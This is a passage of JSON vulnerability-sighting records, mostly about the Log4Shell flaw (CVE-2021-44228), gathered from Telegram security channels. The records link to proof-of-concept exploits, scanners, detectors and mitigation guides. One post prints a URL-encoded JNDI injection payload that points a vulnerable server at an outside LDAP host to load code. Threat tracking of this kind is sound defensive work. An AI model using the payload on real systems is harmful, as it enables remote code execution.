"CVE-2021-44228", "type": "exploited", "source": "Telegram/NanxzSkEBFfU7Ah0fhpr3kvgYdRXqjVVedj4PvsC0TwNKSjL", "content": "", "creation_timestamp": "2021-12-14T15:55:30.000000Z"}, {"uuid": "8054641b-1c17-48c5-8fce-4b086c247916", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/Y_F49hZf5v3qrcyzZV1YCuveQclkBkc4vou9yVZpM4jboeZ_", "content": "", "creation_timestamp": "2021-12-15T18:40:19.000000Z"}, {"uuid": "aa022298-9fcf-4f76-abf7-113fb5cea4df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5140", "content": "#Blue_Team_Techniques\nBackdoor detection for VMware view post Log4j exploitation (CVE-2021-44228)\nhttps://github.com/mr-r3b00t/CVE-2021-44228", "creation_timestamp": "2022-01-06T11:07:01.000000Z"}, {"uuid": "a16dbb15-c1b4-474e-8041-a90187f323bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/x7NdfyahtHER1VR2-K7tu6N12QO70b1os0gGPeb1ZDWmU3no", "content": "", "creation_timestamp": "2021-12-22T02:14:59.000000Z"}, {"uuid": "b1e764c7-66b9-4c65-a687-4c08731c3eea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/_j35Y0bigFpCpAstJS5rZJo9ZV9Xc86xK_dyIX8fWflWIt9E", "content": "", "creation_timestamp": "2021-12-22T03:14:27.000000Z"}, {"uuid": "9e039dcb-f321-446f-acbc-34ebd0ff98ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/ygpPKT_z42oZATGJouV_hvbJGcx3OZuUzhqu8lNKnTGaYhhX", "content": "", "creation_timestamp": "2021-12-22T19:59:38.000000Z"}, {"uuid": "47062432-d631-41a6-ac08-b700204916e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/rFkjz1LM-29KjKv9WpbDIOMfr6W99Ee9g7Fj4exqAuyb3_mr", "content": "", "creation_timestamp": "2021-12-10T23:14:47.000000Z"}, {"uuid": "251abc51-3d59-4605-873f-54db466b603a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/Ei4Q-9yCs6_FKOmkp4HpmInIQ4zUlX28MHqkhSPiu275o_PI", "content": "", "creation_timestamp": "2021-12-11T01:40:36.000000Z"}, {"uuid": "2a82b465-a0a4-4b17-8ebe-1c6d26eb5f98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/K5kqPc-7cES0PGPKn0dPz9vIKwVhGHZVFctcdHL_b2oOlaOr", "content": "", "creation_timestamp": "2021-12-11T21:50:02.000000Z"}, {"uuid": "04b8c959-770a-46e1-ad3b-c6382050e9f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/ZagJuwoy0zkPq1yQ8hpm_-T-BUN44Fwy63-GKG0Vp2kfDkF_", "content": "", "creation_timestamp": "2021-12-12T06:42:43.000000Z"}, {"uuid": "18f6e12a-d984-4c29-8635-432c9d1d2217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/LkWo1kVSGMGGLf6WAl1GLpo4TvLeOkwZt-wHD4BYvtnZgXaJ", "content": "", "creation_timestamp": "2021-12-13T11:20:26.000000Z"}, {"uuid": "9e9fe735-eadc-4d4c-bff6-2d688777e211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/BScEwsJPZVO7ro9zhVLq3sA1V9wXQiLwCk3jDgjYuIZ0HgQA", "content": "", "creation_timestamp": "2021-12-15T21:30:26.000000Z"}, {"uuid": "7ca3ffa3-ea35-448c-ad32-7c8d392a0299", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/A4DNMGhbvslrU-jr48pbdvcV1qg8J8irVp7aNXMD7zwMwZwu", "content": "", "creation_timestamp": "2021-12-16T04:16:29.000000Z"}, {"uuid": "23844188-3af9-46d1-b069-f3324a26ef46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arvin_club/5012", "content": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce", "creation_timestamp": "2021-12-12T04:58:33.000000Z"}, {"uuid": "52f31c6f-122d-415d-bf41-4a20fa51414b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/NOqAMn7_G1r4z2s3z9vD-ynVh6OxL3teXyPJoVeGGgzLsx_y", "content": "", "creation_timestamp": "2021-12-13T15:24:09.000000Z"}, {"uuid": "9a15ed14-00cc-4ddc-9721-907002557cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/-N2j735OcptypJLiHX5LCRDZ0AXXxlGzvj9Y-Xtp8CvyYuqi", "content": "", "creation_timestamp": "2021-12-14T09:19:02.000000Z"}, {"uuid": "cdb019a6-1b7b-450e-80c8-30b8fa74905a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/I6BMOejahWTJGXE1nWnbfuRlaK7IqbKZXFKA2LXstEM6Kw9V", "content": "", "creation_timestamp": "2021-12-14T11:22:39.000000Z"}, {"uuid": "25c09a92-131c-45d1-827d-8a11345116ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/oOjtRmK_iFJkSktTYxqddJcuDhHTZyFuxSnyws9eA-P2WUmZ", "content": "", "creation_timestamp": "2021-12-14T13:51:06.000000Z"}, {"uuid": "63e01b6d-7d3b-47ad-84f5-ccfa36836f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/wxnMtJP7w_azCTTq-rWgtKlddUYSG7-8JCMNqc2Kz650Ric7", "content": "", "creation_timestamp": "2021-12-14T13:51:11.000000Z"}, {"uuid": "8447825a-127d-40a9-9932-7b779d26fa3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-03)", "content": "", "creation_timestamp": "2026-05-03T00:00:00.000000Z"}, {"uuid": "4725726b-0c1f-461e-85c2-5c3f21a048f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/LearnExploit/3232", "content": "Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)\n\n\nGithub \n\n#Log4shell #Nmap \n\u2014\u2014\u2014\u2014\u2014\u2014\u2067\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2022-01-17T12:29:29.000000Z"}, {"uuid": "1ee5698e-adae-432f-b01c-ca264d049d79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "39dd7420-814b-4442-bb7a-bcebbf46cf05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5100", "content": "#exploit\nExploiting CVE-2021-44228 using PDFs as delivery channel\nhttps://github.com/eelyvy/log4jshell-pdf", "creation_timestamp": "2021-12-31T12:07:01.000000Z"}, {"uuid": "eae6ec70-60c1-475a-ae2e-b99c53c1ffc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4422", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "cbb41037-edcd-4ed5-83d4-6c630ad05c3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4998", "content": "#Blue_Team_Techniques\nNmap NSE scripts to check against log4shell/LogJam vulnerabilities (CVE-2021-44228)\nhttps://github.com/Diverto/nse-log4shell", "creation_timestamp": "2021-12-18T11:17:01.000000Z"}, {"uuid": "f9784bcd-ee02-4760-b614-4030e8d3f855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5049", "content": "#hardening\n#Automotive_Security\nExamining Log4j Vulnerabilities in Connected Cars and Charging Stations\nhttps://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html\n]-&gt; Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228/CVE-2021-45046)\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide", "creation_timestamp": "2024-10-04T07:31:39.000000Z"}, {"uuid": "a16656a5-13d9-4734-acba-1368e7c69cf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4978", "content": "#Blue_Team_Techniques\n1. Internal network honeypot for detecting if an attacker/insider threat scans network for log4j CVE-2021-44228\nhttps://github.com/BinaryDefense/log4j-honeypot-flash\n2. Detector for Log4Shell exploitation attempts\nhttps://github.com/Neo23x0/log4shell-detector\n3. Restrict LDAP access via JNDI\nhttps://github.com/apache/logging-log4j2/pull/608", "creation_timestamp": "2021-12-15T12:27:07.000000Z"}, {"uuid": "90852133-99b1-40db-874d-80b1f682bbef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5324", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Jan 1-31)\n\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-40444 - Microsoft MSHTML RCE\nCVE-2021-4034 - LPE vuln was found on polkit's pkexec utility\nCVE-2022-0185 - Linux Kernel Container Escape in Kubernetes\nCVE-2022-21907 - HTTP Protocol Stack RCE\nCVE-2022-21882 - Win32k Window Object Type Confusion\nCVE-2021-20038 - SonicWall SMA-100 Unauth RCE\nCVE-2021-45467 - CWP CentOS Web Panel preauth RCE\nCVE-2021-42392 - Unauth RCE in H2 Database Console\nCVE-2022-21658 - Vulnerability in Rust", "creation_timestamp": "2024-10-15T10:29:54.000000Z"}, {"uuid": "c5f72931-258a-443f-b62b-6a730a73d040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5231", "content": "#Offensive_security\n1. Remote Code Injection in Log4j\nhttps://github.com/jas502n/Log4j2-CVE-2021-44228\n2. Stop Windows Defender programmatically\nhttps://github.com/lab52io/StopDefender", "creation_timestamp": "2022-01-19T11:01:01.000000Z"}, {"uuid": "0b5cc5ed-d934-49f8-91ec-495fc11d565f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5793", "content": "#tools\nLogMePwn is a fully automated, multi-protocol, reliable, super-fast scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability\nhttps://github.com/0xInfection/LogMePwn", "creation_timestamp": "2022-04-12T11:01:01.000000Z"}, {"uuid": "0bb80b8a-c5d2-4f03-99de-ec19383ed741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5084", "content": "#Offensive_security\n1. Internal network honeypot for detecting if an attacker/insider threat scans your network for log4j CVE-2021-44228\nhttps://github.com/BinaryDefense/log4j-honeypot-flask\n2. Environment with vulnerable kernel for exploitation of CVE-2021-44733\nhttps://github.com/pjlantz/optee-qemu", "creation_timestamp": "2021-12-29T13:40:46.000000Z"}, {"uuid": "317bc2ef-04a4-4e14-aa03-6c58b6dffaf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44226", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/5716", "content": "#Red_Team_Tactics\n1. Pwning 3CX Phone Management Backends from the Internet\nhttps://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88\n2. Local Privilege Escalation Attack via Razer Synapse Installer (CVE-2021-44226)\nhttps://blog.syss.com/posts/razer-lpe-attack", "creation_timestamp": "2022-03-31T12:23:44.000000Z"}, {"uuid": "9f5ca1c7-c1e2-419e-93c3-ea839198daeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4960", "content": "#Blue_Team_Techniques\nActiveScan++ extends Burp Suite's active and passive scanning capabilities\nhttps://github.com/PortSwigger/active-scan-plus-plus\n]-&gt; Log4Shell (CVE-2021-44228) detection to ActiveScan++:\nhttps://github.com/PortSwigger/active-scan-plus-plus/blob/master/activeScan++.py\n]-&gt; Log4j Analysis:\nhttps://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection", "creation_timestamp": "2021-12-12T14:54:49.000000Z"}, {"uuid": "ad9494d2-d41e-46cd-82c2-8c7fedd69d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/7395", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n2. CVE-2021-44228: Apache Log4Shell\n3. CVE-2022-22965: Spring4Shell\n4. CVE-2022-1388: F5 BIG-IP\n5. CVE-2022-0609: Google Chrome 0-day\n6. CVE-2017-11882: MS Office RCE\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n9. CVE-2022-26134: Atlassian Confluence RCE\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2024-10-11T03:03:25.000000Z"}, {"uuid": "abeb82e3-df17-45df-99f7-e6a1f1ff8612", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/7456", "content": "#tools\n#Blue_Team_Techniques\n1. HTML Smuggling Detection - HTML Smuggling Detection\nhttps://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841\n2. Log4Shell-Scanner-Exploit - Bash script to identify the Log4j CVE-2021-44228 vulnerability remotely\nhttps://github.com/julian911015/Log4j-Scanner-Exploit", "creation_timestamp": "2022-12-31T12:31:01.000000Z"}, {"uuid": "f04d5e2f-96b2-4db4-8e0e-8caf6b521bca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4947", "content": "#exploit\n1. CVE-2021-44228:\nApache &lt;2.15.0 Log4j RCE\nhttps://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\n]-&gt; https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\n\nStruts2 RCE PoC/IoC: \n/$%7bjndi:ldap:/$%7blower:/%7d192.168.139.1:1389/o=tomcat%7d$%7blower:/%7d/ \n\n2. Log4Shell: RCE 0-day exploit found in log4j2,\na popular Java logging package\nhttps://www.lunasec.io/docs/blog/log4j-zero-day\n\n3. PoC Exploit for ManageEngine ServiceDesk Plus (CVE-2021-44077):\nhttps://github.com/horizon3ai/CVE-2021-44077", "creation_timestamp": "2021-12-14T04:33:49.000000Z"}, {"uuid": "a7fdd278-63db-4cd7-9462-228bc36eba0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/merna_hade_hack/128", "content": "INFOSEC INSIDER\n\n\ufffc\n\nThe Uncertain Future of IT Automation\n\nMarch 8, 2022\n\n\ufffc\n\n6 Cyber-Defense Steps to Take Now to Protect Your Company\n\nFebruary 25, 2022\n\n\u00a01\n\n\ufffc\n\nThe Harsh Truths of Cybersecurity in 2022, Part II\n\nFebruary 24, 2022\n\n\u00a02\n\n\ufffc\n\n3 Tips for Facing the Harsh Truths of Cybersecurity in 2022, Part I\n\nFebruary 9, 2022\n\n\ufffc\n\n\u2018Long Live Log4Shell\u2019: CVE-2021-44228 Not Dead Yet\n\nFebruary 4, 2022\n\nNewsletter\n\nSubscribe to\u00a0Threatpost Today\n\n\u00a0\nJoin thousands of people who receive the latest breaking cybersecurity news every day.\nSubscribe now\n\nTwitter\n\nDenso, supplier to key automotive companies like Toyota, Mercedes-Benz and Ford confirmed Monday that it was the ta\u2026\u00a0https://t.co/yriwJadhRA\n14 hours ago\nFollow @threatpost\n\n\ufffc\n\n\ufffc\n\nSubscribe to our newsletter,\u00a0Threatpost Today!\n\n\u00a0\nGet the latest breaking news delivered daily to your inbox.\n\nSubscribe now\n\nThreatpost\n\nThe First Stop For Security News\n\nCopyright \u00a9 2022 Threatpost\n\nPrivacy Policy\n\nTerms and Conditions\n\nAdvertise", "creation_timestamp": "2022-03-16T11:34:58.000000Z"}, {"uuid": "ce5215bc-5a29-47d4-ba9e-e8880fb6c0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/win_def/62", "content": "\u200b\u200b\u0421\u0443\u0434\u043d\u0430\u044f \u043d\u043e\u0447\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f.\n \n0-day \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u043e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 LunaSec, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0432\u044b\u043a\u043e\u0432 \u0438 \u0443\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0434\u043d\u0443 \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u043a\u043e\u0434\u0430.\n \n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CVE-2021-44228 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apache Software Foundation \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java. Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase \u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a Log4Shell.\n \n\u0412\u0441\u0435 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043b\u043e\u0445\u043e, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 Apache Software Foundation \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043f\u043e\u0432\u043b\u0438\u044f\u043b\u043e \u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e. \u041a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0441\u043a\u0430\u043d\u044f\u0442 \u0441\u0435\u0442\u044c \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043d\u0430 LogJam.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043d\u0430 \u043f\u043e\u043c\u043e\u0449\u044c \u043f\u0440\u0438\u0448\u043b\u0438 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b: Cybereason \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0432\u0430\u043a\u0446\u0438\u043d\u0443 Logout4Shell \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f Log4Shell. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 LDAP \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java, \u043f\u043e \u0441\u0443\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 trustURLCodebase \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Log4j. \u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u0435\u0441\u043b\u0438 Logout4Shell \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u0431\u044b\u043b \u0431\u044b 